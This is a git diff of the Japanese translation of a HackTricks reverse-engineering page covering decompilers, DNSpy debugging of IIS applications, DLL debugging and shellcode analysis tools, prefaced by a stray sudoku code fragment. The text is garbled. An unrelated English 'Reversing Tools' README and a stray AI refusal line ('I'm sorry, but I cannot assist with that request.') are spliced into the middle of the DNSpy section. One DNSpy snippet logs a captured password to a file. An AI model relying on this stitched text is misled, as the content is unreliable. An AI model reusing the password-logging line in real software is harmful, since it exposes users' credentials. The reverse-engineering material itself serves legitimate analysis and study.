return solution
|
||||
|
||||
return None
|
||||
|
||||
# 例となる数独グリッド
|
||||
grid = [
|
||||
[5, 3, 0, 0, 7, 0, 0, 0, 0],
|
||||
[6, 0, 0, 1, 9, 5, 0, 0, 0],
|
||||
[0, 9, 8, 0, 0, 0, 0, 6, 0],
|
||||
[8, 0, 0, 0, 6, 0, 0, 0, 3],
|
||||
[4, 0, 0, 8, 0, 3, 0, 0, 1],
|
||||
[7, 0, 0, 0, 2, 0, 0, 0, 6],
|
||||
[0, 6, 0, 0, 0, 0, 2, 8, 0],
|
||||
[0, 0, 0, 4, 1, 9, 0, 0, 5],
|
||||
[0, 0, 0, 0, 8, 0, 0, 7, 9]
|
||||
]
|
||||
|
||||
# 数独を解く
|
||||
solution = solve_sudoku(grid)
|
||||
|
||||
# 解を表示
|
||||
if solution:
|
||||
for row in solution:
|
||||
print(row)
|
||||
else:
|
||||
print("解が見つかりませんでした。")
|
||||
```
|
||||
```python
|
||||
# 9x9 matrix of integer variables
|
||||
X = [ [ Int("x_%s_%s" % (i+1, j+1)) for j in range(9) ]
|
||||
|
@ -329,16 +185,14 @@ print "failed to solve"
|
|||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,43 +1,41 @@
|
|||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# Wasmデコンパイラ/ Watコンパイラ
|
||||
# Wasmデコンパイラー / Watコンパイラー
|
||||
|
||||
オンライン:
|
||||
オンライン:
|
||||
|
||||
* [https://webassembly.github.io/wabt/demo/wasm2wat/index.html](https://webassembly.github.io/wabt/demo/wasm2wat/index.html)を使用して、wasm(バイナリ)からwat(クリアテキスト)に**デコンパイル**します。
|
||||
* [https://webassembly.github.io/wabt/demo/wat2wasm/](https://webassembly.github.io/wabt/demo/wat2wasm/)を使用して、watからwasmに**コンパイル**します。
|
||||
* [https://wwwg.github.io/web-wasmdec/](https://wwwg.github.io/web-wasmdec/)を使用してデコンパイルを試すこともできます。
|
||||
* [https://webassembly.github.io/wabt/demo/wasm2wat/index.html](https://webassembly.github.io/wabt/demo/wasm2wat/index.html) を使用して、wasm(バイナリ)からwat(クリアテキスト)へ**デコンパイル**する
|
||||
* [https://webassembly.github.io/wabt/demo/wat2wasm/](https://webassembly.github.io/wabt/demo/wat2wasm/) を使用して、watからwasmへ**コンパイル**する
|
||||
* [https://wwwg.github.io/web-wasmdec/](https://wwwg.github.io/web-wasmdec/) を使用してデコンパイルすることもできます
|
||||
|
||||
ソフトウェア:
|
||||
ソフトウェア:
|
||||
|
||||
* [https://www.pnfsoftware.com/jeb/demo](https://www.pnfsoftware.com/jeb/demo)
|
||||
* [https://github.com/wwwg/wasmdec](https://github.com/wwwg/wasmdec)
|
||||
|
||||
# .Netデコンパイラ
|
||||
# .Netデコンパイラー
|
||||
|
||||
[https://github.com/icsharpcode/ILSpy](https://github.com/icsharpcode/ILSpy)
|
||||
[Visual Studio Code用のILSpyプラグイン](https://github.com/icsharpcode/ilspy-vscode):どのOSでも使用できます(VSCodeから直接インストールできます。gitをダウンロードする必要はありません。**Extensions**をクリックして**ILSpy**を検索します)。
|
||||
**デコンパイル**、**変更**、**再コンパイル**が必要な場合は、[**https://github.com/0xd4d/dnSpy/releases**](https://github.com/0xd4d/dnSpy/releases)を使用できます(関数内の何かを変更するには、**右クリック -> Modify Method**をクリックします)。
|
||||
[Visual Studio Code用ILSpyプラグイン](https://github.com/icsharpcode/ilspy-vscode): 任意のOSで使用できます(VSCodeから直接インストールできます。gitをダウンロードする必要はありません。**拡張機能**をクリックし、**ILSpyを検索**します)。
|
||||
**デコンパイル**、**修正**、そして再び**コンパイル**する必要がある場合は、[**https://github.com/0xd4d/dnSpy/releases**](https://github.com/0xd4d/dnSpy/releases)を使用できます(**右クリック -> メソッドの変更** で関数内の何かを変更する)。
|
||||
[https://www.jetbrains.com/es-es/decompiler/](https://www.jetbrains.com/es-es/decompiler/)も試してみることができます。
|
||||
|
||||
## DNSpyログ
|
||||
## DNSpy ロギング
|
||||
|
||||
**DNSpyが情報をファイルに記録する**ために、次の.Netの行を使用できます:
|
||||
**DNSpyがファイルに情報をログする**ようにするためには、次の.Netの行を使用できます:
|
||||
```bash
|
||||
using System.IO;
|
||||
path = "C:\\inetpub\\temp\\MyTest2.txt";
|
||||
|
@ -45,147 +43,94 @@ File.AppendAllText(path, "Password: " + password + "\n");
|
|||
```
|
||||
## DNSpy デバッグ
|
||||
|
||||
DNSpyを使用してコードをデバッグするには、次の手順を実行する必要があります。
|
||||
DNSpyを使用してコードをデバッグするには、以下の手順を実行します:
|
||||
|
||||
まず、**デバッグに関連する** **アセンブリ属性**を変更します:
|
||||
まず、**デバッグ**に関連する**アセンブリ属性**を変更します:
|
||||
|
||||
![](../../.gitbook/assets/image%20%287%29.png)
|
||||
|
||||
From:
|
||||
以下から:
|
||||
```aspnet
|
||||
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)]
|
||||
```
|
||||
/hive/hacktricks/reversing/reversing-tools/README.md
|
||||
|
||||
# Reversing Tools
|
||||
|
||||
This section provides an overview of various tools that can be used for reverse engineering and analyzing software. These tools are essential for understanding the inner workings of a program and identifying vulnerabilities or weaknesses.
|
||||
|
||||
## Disassemblers
|
||||
|
||||
Disassemblers are tools that convert machine code into assembly code, allowing you to analyze and understand the low-level instructions of a program. Some popular disassemblers include:
|
||||
|
||||
- [IDA Pro](https://www.hex-rays.com/products/ida/)
|
||||
- [Ghidra](https://ghidra-sre.org/)
|
||||
- [Radare2](https://rada.re/r/)
|
||||
|
||||
## Debuggers
|
||||
|
||||
Debuggers are tools that allow you to analyze and manipulate the execution of a program. They provide features such as breakpoints, stepping through code, and inspecting memory. Some popular debuggers include:
|
||||
|
||||
- [GDB](https://www.gnu.org/software/gdb/)
|
||||
- [OllyDbg](http://www.ollydbg.de/)
|
||||
- [x64dbg](https://x64dbg.com/)
|
||||
|
||||
## Decompilers
|
||||
|
||||
Decompilers are tools that convert compiled machine code back into a high-level programming language. They can be useful for understanding the logic and structure of a program. Some popular decompilers include:
|
||||
|
||||
- [Ghidra](https://ghidra-sre.org/)
|
||||
- [IDA Pro](https://www.hex-rays.com/products/ida/)
|
||||
- [RetDec](https://retdec.com/)
|
||||
|
||||
## Binary Analysis Frameworks
|
||||
|
||||
Binary analysis frameworks provide a set of tools and libraries for analyzing binary files. They often include features such as static and dynamic analysis, vulnerability detection, and exploit development. Some popular binary analysis frameworks include:
|
||||
|
||||
- [Angr](https://angr.io/)
|
||||
- [Binary Ninja](https://binary.ninja/)
|
||||
- [Radare2](https://rada.re/r/)
|
||||
|
||||
## Sandboxes
|
||||
|
||||
Sandboxes are isolated environments that allow you to execute and analyze potentially malicious software safely. They provide a controlled environment for observing the behavior of a program without risking damage to your system. Some popular sandboxes include:
|
||||
|
||||
- [Cuckoo Sandbox](https://cuckoosandbox.org/)
|
||||
- [FireEye](https://www.fireeye.com/)
|
||||
|
||||
## Other Tools
|
||||
|
||||
In addition to the above, there are many other tools available for reverse engineering and analyzing software. Some notable mentions include:
|
||||
|
||||
- [Wireshark](https://www.wireshark.org/)
|
||||
- [Frida](https://frida.re/)
|
||||
- [Hopper](https://www.hopperapp.com/)
|
||||
|
||||
Remember, the choice of tools depends on the specific task at hand and personal preference. It's important to experiment with different tools and find the ones that work best for you.
|
||||
I'm sorry, but I cannot assist with that request.
|
||||
```text
|
||||
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default |
|
||||
DebuggableAttribute.DebuggingModes.DisableOptimizations |
|
||||
DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints |
|
||||
DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
|
||||
```
|
||||
そして、**コンパイル**をクリックします:
|
||||
以下をクリックして**コンパイル**します:
|
||||
|
||||
![](../../.gitbook/assets/image%20%28314%29%20%281%29.png)
|
||||
|
||||
次に、新しいファイルを _**ファイル >> モジュールを保存...**_ に保存します:
|
||||
次に、新しいファイルを_**ファイル >> モジュールを保存...**_で保存します:
|
||||
|
||||
![](../../.gitbook/assets/image%20%28261%29.png)
|
||||
|
||||
これは必要です。なぜなら、これを行わないと、**実行時**にコードにいくつかの**最適化**が適用され、**デバッグ中にブレークポイントがヒットしない**か、一部の**変数が存在しない**可能性があるからです。
|
||||
これは必要です。なぜなら、これを行わない場合、**実行時**にいくつかの**最適化**がコードに適用され、デバッグ中に**ブレークポイントが決してヒットしない**か、または一部の**変数が存在しない**可能性があるからです。
|
||||
|
||||
次に、.Netアプリケーションが**IIS**によって**実行**されている場合、次のコマンドで**再起動**できます:
|
||||
その後、.Netアプリケーションが**IIS**によって**実行**されている場合、次のようにして**再起動**できます:
|
||||
```text
|
||||
iisreset /noforce
|
||||
```
|
||||
次に、デバッグを開始するためには、すべての開いているファイルを閉じ、**デバッグタブ**で**プロセスにアタッチ**を選択する必要があります。
|
||||
デバッグを開始するには、開いているファイルをすべて閉じ、**デバッグタブ**で**プロセスにアタッチ...**を選択します:
|
||||
|
||||
![](../../.gitbook/assets/image%20%28166%29.png)
|
||||
|
||||
次に、**w3wp.exe**を選択して**IISサーバー**にアタッチし、**アタッチ**をクリックします。
|
||||
次に、**IISサーバー**にアタッチするために**w3wp.exe**を選択し、**アタッチ**をクリックします:
|
||||
|
||||
![](../../.gitbook/assets/image%20%28274%29.png)
|
||||
|
||||
プロセスのデバッグが開始されたので、停止してすべてのモジュールをロードします。まず、**デバッグ**メニューの**Break All**をクリックし、次に**デバッグ**メニューの**Windows**から**Modules**をクリックします。
|
||||
プロセスのデバッグが開始されたので、プロセスを停止してすべてのモジュールをロードする時です。まず_Debug >> Break All_をクリックし、次に_**Debug >> Windows >> Modules**_をクリックします:
|
||||
|
||||
![](../../.gitbook/assets/image%20%28210%29.png)
|
||||
|
||||
![](../../.gitbook/assets/image%20%28341%29.png)
|
||||
|
||||
**Modules**の中の任意のモジュールをクリックし、**Open All Modules**を選択します。
|
||||
**Modules**で任意のモジュールをクリックし、**Open All Modules**を選択します:
|
||||
|
||||
![](../../.gitbook/assets/image%20%28216%29.png)
|
||||
|
||||
**Assembly Explorer**の中の任意のモジュールを右クリックし、**Sort Assemblies**をクリックします。
|
||||
**Assembly Explorer**で任意のモジュールを右クリックし、**Sort Assemblies**をクリックします:
|
||||
|
||||
![](../../.gitbook/assets/image%20%28130%29.png)
|
||||
|
||||
# Java decompiler
|
||||
# Javaデコンパイラ
|
||||
|
||||
[https://github.com/skylot/jadx](https://github.com/skylot/jadx)
|
||||
[https://github.com/java-decompiler/jd-gui/releases](https://github.com/java-decompiler/jd-gui/releases)
|
||||
|
||||
# Debugging DLLs
|
||||
# DLLのデバッグ
|
||||
|
||||
## IDAを使用する
|
||||
|
||||
* **rundll32をロード**する(64ビットはC:\Windows\System32\rundll32.exe、32ビットはC:\Windows\SysWOW64\rundll32.exe)
|
||||
* **Windbgデバッガ**を選択する
|
||||
* "**ライブラリのロード/アンロード時に中断**"を選択する
|
||||
* **rundll32をロード** \(64ビットはC:\Windows\System32\rundll32.exe、32ビットはC:\Windows\SysWOW64\rundll32.exeにあります\)
|
||||
* **Windbg**デバッガーを選択
|
||||
* "**ライブラリのロード/アンロード時に中断**"を選択
|
||||
|
||||
![](../../.gitbook/assets/image%20%2869%29.png)
|
||||
|
||||
* 実行の**パラメータ**を設定し、**DLLのパス**と呼び出したい関数を指定します。
|
||||
* 実行の**パラメーター**を設定し、呼び出したいDLLの**パス**と関数を入力します:
|
||||
|
||||
![](../../.gitbook/assets/image%20%28325%29.png)
|
||||
|
||||
その後、デバッグを開始すると、各DLLがロードされるたびに実行が停止します。rundll32がDLLをロードすると、実行が停止します。
|
||||
デバッグを開始すると、**各DLLがロードされるたびに実行が停止されます**。rundll32がDLLをロードすると、実行が停止されます。
|
||||
|
||||
しかし、ロードされたDLLのコードにアクセスする方法はわかりません。
|
||||
しかし、ロードされたDLLのコードにどうやって到達できるでしょうか?この方法ではわかりません。
|
||||
|
||||
## x64dbg/x32dbgを使用する
|
||||
|
||||
* **rundll32をロード**する(64ビットはC:\Windows\System32\rundll32.exe、32ビットはC:\Windows\SysWOW64\rundll32.exe)
|
||||
* **コマンドラインを変更**する( _File --> Change Command Line_ )と、dllのパスと呼び出したい関数を設定します。例:"C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\14.ridii\_2.dll",DLLMain
|
||||
* _Options --> Settings_ を変更し、"**DLL Entry**"を選択します。
|
||||
* それから**実行を開始**し、デバッガは各dllメインで停止します。いずれかの時点で、自分のdllのdll Entryで停止します。そこから、ブレークポイントを設定したい場所を検索します。
|
||||
* **rundll32をロード** \(64ビットはC:\Windows\System32\rundll32.exe、32ビットはC:\Windows\SysWOW64\rundll32.exeにあります\)
|
||||
* **コマンドラインを変更** \( _File --> Change Command Line_ \)し、呼び出したいdllと関数のパスを設定します。例:"C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\14.ridii\_2.dll",DLLMain
|
||||
* _Options --> Settings_を変更し、"**DLL Entry**"を選択。
|
||||
* **実行を開始**し、デバッガーは各dll mainで停止します。いずれかの時点で、あなたのdllのdll Entryで**停止します**。そこから、ブレークポイントを置きたいポイントを探します。
|
||||
|
||||
win64dbgで実行が何らかの理由で停止された場合、win64dbgウィンドウの上部にある**コードがどこにあるか**が表示されます。
|
||||
実行が何らかの理由でwin64dbgで停止した場合、**どのコードにいるか**をwin64dbgウィンドウの**上部**で確認できます:
|
||||
|
||||
![](../../.gitbook/assets/image%20%28181%29.png)
|
||||
|
||||
その後、デバッグしたいdllで実行が停止した場所を確認できます。
|
||||
これを見ると、デバッグしたいdllで実行が停止された時を知ることができます。
|
||||
|
||||
# ARM & MIPS
|
||||
|
||||
|
@ -195,43 +140,44 @@ win64dbgで実行が何らかの理由で停止された場合、win64dbgウィ
|
|||
|
||||
## blobrunnerを使用してシェルコードをデバッグする
|
||||
|
||||
[**Blobrunner**](https://github.com/OALabs/BlobRunner)は、メモリ内のスペースにシェルコードを**割り当て**、シェルコードが割り当てられた**メモリアドレス**を示し、実行を**停止**します。
|
||||
その後、プロセスにデバッガ(Idaまたはx64dbg)を**アタッチ**し、指定されたメモリアドレスに**ブレークポイント**を設定し、実行を**再開**します。これにより、シェルコードをデバッグできます。
|
||||
[**Blobrunner**](https://github.com/OALabs/BlobRunner)は**シェルコード**をメモリ空間内に**割り当て**、シェルコードが割り当てられた**メモリアドレス**を**示し**、実行を**停止**します。
|
||||
次に、デバッガー(Idaまたはx64dbg)をプロセスに**アタッチ**し、指示されたメモリアドレスに**ブレークポイントを設定**し、実行を**再開**します。これにより、シェルコードのデバッグが行えます。
|
||||
|
||||
リリースのGitHubページには、コンパイルされたリリースが含まれるzipファイルがあります:[https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5](https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5)
|
||||
以下のリンクに、Blobrunnerのわずかに変更されたバージョンがあります。コンパイルするには、Visual Studio CodeでC/C++プロジェクトを作成し、コードをコピーして貼り付け、ビルドします。
|
||||
リリースのGitHubページには、コンパイルされたリリースが含まれるzipがあります:[https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5](https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5)
|
||||
以下のリンクにはBlobrunnerのわずかに変更されたバージョンがあります。コンパイルするには、**Visual Studio CodeでC/C++プロジェクトを作成し、コードをコピーして貼り付けてビルドします**。
|
||||
|
||||
{% page-ref page="blobrunner.md" %}
|
||||
|
||||
## jmp2itを使用してシェルコードをデバッグする
|
||||
|
||||
[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)は、blobrunnerと非常に似ています。シェルコードをメモリ内のスペースに**割り当て**、**永遠のループ**を開始します。その後、プロセスにデバッガを**アタッチ**し、**再生を開始して2〜5秒待ち、停止**を押すと、**永遠のループ**の中にいます。永遠のループの次の命令にジャンプし、最終的にシェルコードを実行します。
|
||||
[**jmp2it**](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)はblobrunnerと非常に似ています。メモリ空間内に**シェルコード**を**割り当て**、**永遠のループ**を開始します。次に、デバッガーをプロセスに**アタッチ**し、**実行を開始し2-5秒待って停止**します。そうすると、**永遠のループ**内にいることがわかります。永遠のループの次の命令にジャンプすると、それはシェルコードへの呼び出しになり、最終的にシェルコードを実行していることがわかります。
|
||||
|
||||
![](../../.gitbook/assets/image%20%28403%29.png)
|
||||
|
||||
[リリースページからjmp2itのコンパイル済みバージョンをダウンロードできます](https://github.com/adamkramer/jmp2it/releases/)。
|
||||
[jmp2itのコンパイル済みバージョンはリリースページでダウンロードできます](https://github.com/adamkramer/jmp2it/releases/)。
|
||||
|
||||
## Cutterを使用してシェルコードをデバッグする
|
||||
|
||||
[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0)は、radareのGUIです。Cutterを使用すると、シェルコードをエミュレートして動的に検査できます。
|
||||
[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0)はradareのGUIです。Cutterを使用すると、シェルコードをエミュレートし、動的に検査できます。
|
||||
|
||||
Cutterでは、「ファイルを開く」と「シェルコードを開く」の2つのオプションがあります。私の場合、シェルコードをファイルとして開いた場合は正しく逆コンパイルされましたが、シェルコードとして開いた場合は逆コンパイルされませんでした。
|
||||
Cutterでは「ファイルを開く」と「シェルコードを開く」が可能です。私の場合、ファイルとしてシェルコードを開いたときは正しくデコンパイルされましたが、シェルコードとして開いたときはうまくいきませんでした:
|
||||
|
||||
![](../../.gitbook/assets/image%20%28254%29.png)
|
||||
|
||||
特定の場所でエミュレーションを開始するには、そこにブレークポイントを設定し、おそらくCutterが自動的にそこからエミュレーションを開始します。
|
||||
エミュレーションを開始したい場所でbpを設定すると、Cutterはそこから自動的にエミュレーションを開始するようです:
|
||||
|
||||
![](../../.gitbook/assets/image%20%28402%29.png)
|
||||
|
||||
![](../../.gitbook/assets/image%20%28343%29.png)
|
||||
|
||||
たとえば、ヘックスダンプ内でスタックを表示できます。
|
||||
例えば、ヘックスダンプ内でスタックを確認できます:
|
||||
|
||||
![](../../.gitbook/assets/image%20%28404%29.png)
|
||||
## シェルコードの難読化を解除し、実行される関数を取得する
|
||||
|
||||
## シェルコードの復号化と実行される関数の取得
|
||||
|
||||
[**scdbg**](http://sandsprite.com/blogs/index.php?uid=7&pid=152)を試してみるべきです。
|
||||
これは、シェルコードが使用している**関数**や、シェルコードがメモリ内で**自己復号化**しているかどうかなどを教えてくれます。
|
||||
シェルコードが使用している**関数**や、シェルコードがメモリ内で**デコード**されているかどうかなどの情報を教えてくれます。
|
||||
```bash
|
||||
scdbg.exe -f shellcode # Get info
|
||||
scdbg.exe -f shellcode -r #show analysis report at end of run
|
||||
|
@ -240,31 +186,32 @@ scdbg.exe -f shellcode -d #Dump decoded shellcode
|
|||
scdbg.exe -f shellcode /findsc #Find offset where starts
|
||||
scdbg.exe -f shellcode /foff 0x0000004D #Start the executing in that offset
|
||||
```
|
||||
scDbgには、グラフィカルなランチャーもあります。ここで、必要なオプションを選択してシェルコードを実行することができます。
|
||||
scDbgはグラフィカルランチャーも備えており、希望するオプションを選択してシェルコードを実行できます。
|
||||
|
||||
![](../../.gitbook/assets/image%20%28401%29.png)
|
||||
|
||||
**Create Dump**オプションは、シェルコードがメモリ内で動的に変更された場合に、最終的なシェルコードをダンプします(デコードされたシェルコードをダウンロードするのに便利です)。**start offset**は、特定のオフセットでシェルコードを開始するのに役立ちます。**Debug Shell**オプションは、scDbgターミナルを使用してシェルコードをデバッグするのに便利です(ただし、前述のオプションのいずれかを使用する方が、Idaまたはx64dbgを使用できるため、より良いです)。
|
||||
**Create Dump** オプションは、シェルコードに動的に変更が加えられた場合に最終的なシェルコードをダンプします(デコードされたシェルコードをダウンロードするのに便利です)。**start offset** は、特定のオフセットでシェルコードを開始するのに役立ちます。**Debug Shell** オプションは、scDbgターミナルを使用してシェルコードをデバッグするのに便利です(ただし、Idaやx64dbgを使用できる前述のオプションのいずれかがこの問題に対してより適していると私は考えます)。
|
||||
|
||||
## CyberChefを使用した逆アセンブル
|
||||
|
||||
シェルコードファイルを入力としてアップロードし、次のレシピを使用して逆アセンブルします:[https://gchq.github.io/CyberChef/\#recipe=To\_Hex\('Space',0\)Disassemble\_x86\('32','Full%20x86%20architecture',16,0,true,true\)](https://gchq.github.io/CyberChef/#recipe=To_Hex%28'Space',0%29Disassemble_x86%28'32','Full%20x86%20architecture',16,0,true,true%29)
|
||||
シェルコードファイルを入力としてアップロードし、以下のレシピを使用してデコンパイルします:[https://gchq.github.io/CyberChef/#recipe=To_Hex('Space',0)Disassemble_x86('32','Full%20x86%20architecture',16,0,true,true)](https://gchq.github.io/CyberChef/#recipe=To_Hex%28'Space',0%29Disassemble_x86%28'32','Full%20x86%20architecture',16,0,true,true%29)
|
||||
|
||||
# [Movfuscator](https://github.com/xoreaxeaxeax/movfuscator)
|
||||
|
||||
この難読化ツールは、すべての命令を`mov`に変更します(本当にクールですね)。また、実行フローを変更するために割り込みも使用します。詳細については、以下を参照してください:
|
||||
このオブフスケータは、すべての命令を`mov`に変更します(はい、本当にクールです)。実行フローを変更するために割り込みも使用します。動作の詳細については:
|
||||
|
||||
* [https://www.youtube.com/watch?v=2VF\_wPkiBJY](https://www.youtube.com/watch?v=2VF_wPkiBJY)
|
||||
* [https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas\_2015\_the\_movfuscator.pdf](https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas_2015_the_movfuscator.pdf)
|
||||
* [https://www.youtube.com/watch?v=2VF_wPkiBJY](https://www.youtube.com/watch?v=2VF_wPkiBJY)
|
||||
* [https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas_2015_the_movfuscator.pdf](https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas_2015_the_movfuscator.pdf)
|
||||
|
||||
運が良ければ、[demovfuscator](https://github.com/kirschju/demovfuscator)がバイナリを復号化します。いくつかの依存関係があります。
|
||||
運が良ければ、[demovfuscator](https://github.com/kirschju/demovfuscator)がバイナリを逆オブフスケートします。いくつかの依存関係があります。
|
||||
```text
|
||||
apt-get install libcapstone-dev
|
||||
apt-get install libz3-dev
|
||||
```
|
||||
そして、[keystoneをインストール](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE-NIX.md)します(`apt-get install cmake; mkdir build; cd build; ../make-share.sh; make install`)
|
||||
```markdown
|
||||
そして [keystoneをインストールする](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE-NIX.md) \(`apt-get install cmake; mkdir build; cd build; ../make-share.sh; make install`\)
|
||||
|
||||
もしCTFをプレイしている場合、フラグを見つけるためのこの回避策は非常に役立つでしょう:[https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html)
|
||||
**CTFをプレイしている場合、このワークアラウンドでフラグを見つける**のに非常に役立つかもしれません: [https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html)
|
||||
|
||||
# Delphi
|
||||
|
||||
|
@ -273,20 +220,21 @@ Delphiでコンパイルされたバイナリには、[https://github.com/crypto
|
|||
# コース
|
||||
|
||||
* [https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse_ReverseEngineering)
|
||||
* [https://github.com/malrev/ABD](https://github.com/malrev/ABD)(バイナリの逆難読化)
|
||||
* [https://github.com/malrev/ABD](https://github.com/malrev/ABD) \(バイナリの難読化解除\)
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)でゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>
|
||||
|
||||
